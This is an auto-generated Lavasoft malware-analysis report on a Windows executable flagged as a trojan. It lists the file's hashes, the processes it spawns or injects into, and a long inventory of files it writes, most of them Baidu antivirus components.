Gen.Trojan.Heur.JP.bq0aW98Nwnb_6653a00161

Gen:Trojan.Heur.JP.bq0@aW98Nwnb (AdAware), Trojan.Win32.Alureon.FD, mzpefinder_pcap_file.YR (Lavasoft MAS) Behaviour: Trojan The description has been automatically generated by Lavasoft Malware Analy...
Blog rating:5 out of5 with1 ratings

Gen.Trojan.Heur.JP.bq0aW98Nwnb_6653a00161

by malwarelabrobot on November 7th, 2014 in Malware Descriptions.

Gen:Trojan.Heur.JP.bq0@aW98Nwnb (AdAware), Trojan.Win32.Alureon.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 6653a00161a58061f2e6bc283de8edee
SHA1: 70db6bbf6945e4d9c8088678a710b5b72d9ecd28
SHA256: bc1799830b131d74e3dc0db5bf4b22dd574474926544434e7cfd727d8798b4fb
SSDeep: 12288:HRWNcr8oxn/1CSbCqMPFROvw8Y8KRFe4CO uJyx/VX6WbODE28Ydq9TyoNHTaW5e:gNBI5/VNbOQ2s9TdHe1pb8c
Size: 813662 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: AirInstaller
Created at: 2013-12-01 10:08:23
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

F1023_s_30803.exe:780
BaiduHips.exe:3260
BaiduHips.exe:320
netsh.exe:2640
BDKVWsc.exe:2568
BDKVWsc.exe:2668
RegSvr32.exe:2972
RegSvr32.exe:2256
RegSvr32.exe:560
RegSvr32.exe:1232
RegSvr32.exe:2360
bddownloader.exe:2600
bddownloader.exe:3792
G1023_s_70904.exe:3576
%original file name%.exe:716
BaiduSdTray.exe:2844
BaiduAnTray.exe:3824
setup.exe:1056
cacls.exe:1860
MsiExec.exe:548
MsiExec.exe:1968
BaiduAnBugRpt.exe:916
BDASWDeskGuide.exe:228
baiduanTray.exe:3012
BindEx.exe:1568
BindEx.exe:1040
setup.tmp:1976
regsvr32.exe:2652
regsvr32.exe:1520
regsvr32.exe:2920
BDALeakfixer.exe:3188
BaiduAn.exe:3824
BaiduAn.exe:1952
BaiduSdBugRpt.exe:2180
BaiduSdUpdate.exe:2680
BaiduSdUpdate.exe:2228
BaiduAnSvc.exe:3768
BaiduAnSvc.exe:3664
BaiduSdSvc.exe:1500

The Trojan injects its code into the following process(es):

bddownloader.exe:3300
services.exe:724
svchost.exe:1084

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process F1023_s_30803.exe:780 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMPatchAgent.dll (3104 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDUDiskGuard.dll (1281 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\FTSysFixer\SysFixerXMLScript.dat (2 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\ad.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSd.exe (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\res\InstallWnd.zip (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDCooly.dll (3312 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVMC.rdb (5520 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\hips_customer.xml (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\tips.xml (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\TrustAndIso.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\BDDownLoadProtectPlugin.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\hips_self_enc.xml (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\wverify.dat (15019 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHipsUpdate.exe (37 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\ToastLogo.ico (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\vcrt.msi (22552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDPerflog.dll (10512 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMStringUtils.dll (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BSRLib.dat (5064 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\bdcomproxy.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDLogicUtils.dll (16864 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\811.dat (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv2.tmp (1287722 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\NetService.ini (615 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\baidusdRepair.dll (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVRmvDevPlugin.dll (8560 bytes)
%Program Files%\Common Files\Baidu\BDDownload\108\bddownloader.exe (9605 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdUProxy64.exe (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMAVEng.dll (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVTray\TrayPlugin.rdb (18424 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDDriverFixer.dll (1281 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMNet.dll (5873 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHipsIU.dll (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMSREng.dll (10136 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\CompatibilityChecker.dll (673 bytes)
%Program Files%\Common Files\Baidu\BDDownload\108\bdcomproxy.dll (601 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMPatchAgent.dll (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\UserDetectionPlugin.dll (5520 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\systemfile.dat (3 bytes)
%System%\config (576 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\806.dat (3 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdUpdate.exe (7385 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\HIPSClient.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMWindowsLib.dll (3312 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDPerflog.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\monitor_config.dat (559 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\bd0001.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDKitUtils.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\drivers\BDMWrench.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0001.dll (4992 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\Repair_PluginConfig.xml (411 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\KVRtp_PluginConfig.xml (2 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\virus_type.dat (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\bduf.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\TrayPluginContainerConfig.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\810.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdUpdate.exe (33263 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVWsc.exe (13368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\GetSupplyId.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0002.sys (13168 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavFrame.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVDownloadProtect_x64.dll (673 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x86\bd0001.sys (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMWindowsLib.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMLog.dll (1552 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDLogicUtils.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\TrustAndIso.dll (13440 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHips.exe (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavScanV.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\ToastLogo.ico (12024 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\blacksign.dat (852 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\vatl.msi (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\repairplugins\RepairPluginContainerConfig.xml (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMSRCore.dll (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVFixerConfigMgr.dll (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\804.dat (3 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\WebMonHook.dll (2105 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\InstallCfg.xml (177 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\bd0002.dll (3073 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\GameNoDisturb.ini (215 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\uninst.exe (6841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduHipsIU.dll (1856 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMTinyXml.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDUDiskGuard.dll (7192 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVDeskBand.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\tuopan.png (3 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMStringUtils.dll (63 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x64\bd0001.sys (673 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDPerflog.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\hips_self_enc.xml (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\RtpContainerConfig.xml (818 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\806.dat (3 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMDownload.dll (2105 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDLogicUtils.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\TrustAndIso.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMFrameWork.dll (1425 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDShellExt64.dll (2321 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\hips_customer.xml (75 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\cache_config.dat (469 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\wverify.dat (15019 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSd.exe (2105 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMSDWrench.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVDeskBand.dll (5064 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMFrameWork.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\NetService.ini (1230 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\TrayDldProtect.rdb (3616 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x64\bd0001.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMPatchAgent.dll (39 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\PrivacyProtect.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\BDMSkin.dll (37727 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\hips_product.xml (291 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduHips.exe (38495 bytes)
%System%\config\system (2566 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\KVInstallHelper.dll (16424 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\white_list.dat (2105 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVUpdate.rdb (13584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\901.dat (8 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\blacksign.dat (852 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\ToastImage.png (5 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch.7z (7433 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\FTSysFixer\SysFixerLuaScript.dat (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDLogicUtils.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDArKit.sys (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\SysFixerConfig.dat (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMAVCached.dll (1425 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMNet.dll (6841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bdvs.dat (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavScanH.dll (1856 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\bd0001.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bdmp.dat (1552 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\updlog.dll (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\kav_verify.dat (677 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\NetService.ini (615 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\vcrt.msi (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMSkin.dll (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\RtpContainerConfig.xml (818 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDDownLoadProtectPlugin.dll (16288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMAVCached.dll (23584 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmsysrepair\BDMSREng.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\monitor_config.dat (559 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\NetService.ini (615 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdBugRpt.exe (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\FTSysFixer\SysFixerConfig.dat (1 bytes)
%Documents and Settings%\All Users\Desktop\百度杀毒.lnk (895 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\drivers\BDArKit.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\dl.dll (14988 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHipsBugRpt.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\WebMonHook.dll (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVMainframe_PluginConfig.xml (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMDownload.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\systemfile.dat (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\vatl.msi (6584 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\GCCallbackBind.dll (39 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\Cooly_PluginConfig.xml (726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMSDWrench.dll (3312 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\DesktopToast.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMRepMgr.dll (12088 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMTinyXml.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdSvc.exe (27704 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\coolyplugins\CoolyContainerConfig.xml (329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVTrayTipsPlugin.dll (6584 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMUpdate.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\TrayPullUpWS.rdb (3616 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMScriptVM.dll (1281 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\hips_product.xml (291 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVVirusPlugins.dll (12088 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\KavUpdate.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\RepairPluginContainerConfig.xml (228 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\Database\bdmp.dat (32 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\kav_verify.dat (677 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVRtp_PluginConfig.xml (2 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavScanH.dll (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\WebSafePlugin.dll (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\uninst.exe (29256 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\TrayPlugin.rdb (9608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0003.sys (1856 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMPatchAgent.dll (43 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\hips_self_enc.xml (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMDbSqlite.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\duilib license.txt (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMLog.dll (43 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDConfig.dll (3073 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVTray.rdb (1552 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x64\bd0002.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\TrustAndIso.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\CoolyContainerConfig.xml (329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\fm.dat (597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\DriverManager.dll (8608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\white_list.dat (12088 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsIU.dll (55 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVTips.rdb (2392 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsBugRpt.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdUProxy64.exe (23936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavScanS.dll (2392 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\900.dat (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\Cooly_PluginConfig.xml (726 bytes)
%System%\drivers\bd0003.sys (55 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\systemfile.dat (3 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\BDKVTrayTipsPlugin.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMBase.dll (7345 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\GCScriptBind.dll (7345 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\FileMon.dll (21216 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\placeholder_tmp (11 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\7z.dll (2105 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x86\bd0002.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\DriverManager.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKitUtils.dll (2392 bytes)
%Program Files%\Common Files\Baidu\BDDownload\108\dl.dll (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMUpdate.dll (12104 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKV.rdb (3312 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\DllInject.dll (43 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\iexplore.exe.xml (528 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\809.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\dl.dll (65930 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\smr.dat (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\SearchProtection.rdb (5064 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\tuopan.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDShellExt.dll (14184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMDownload.dll (15336 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavScanM.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\KVMainframe_PluginConfig.xml (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x86\bd0001.sys (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\scan_mgr_config.dat (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDShellExt64.dll (15168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\placeholder_tmp (11 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\ccesign.dat (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMMsg.dll (1552 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVQuarantine.rdb (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\virus_type.dat (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMAVCached.dll (1425 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\百度杀毒\百度杀毒.lnk (907 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMBase.dll (7345 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMMsg.dll (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0002.dll (16424 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMUpdate.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavScanM.dll (2392 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMEvents.dll (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\wverify.dat (132336 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVDeskBand64.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\TrayPluginContainerConfig.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\GameNoDisturb.ini (215 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\900.dat (8 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDConfig.dll (3073 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVRecomm.dll (13122 bytes)
%System%\drivers\bd0002.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMLog.dll (43 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\bd0001.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMReport.dll (1425 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmsysrepair\BSRLib.dat (673 bytes)
%System%\config\SYSTEM.LOG (5938 bytes)
%System%\drivers\bd0001.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMBase.dll (32128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\GCCallbackBind.dll (1552 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\百度杀毒\卸载百度杀毒.lnk (880 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\GCScriptBind.dll (32128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\PrivacyProtect.dll (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\iexplore.exe.xml (528 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVDownloadProtect.dll (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\directui license.txt (593 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkv\KVMainframePluginContainerConfig.xml (384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\HIPSClient.dll (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVDownloadProtect_x64.dll (6360 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\tips.xml (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdRepair.exe (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\putips_wording.dat (580 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVRecomm.dll (58402 bytes)
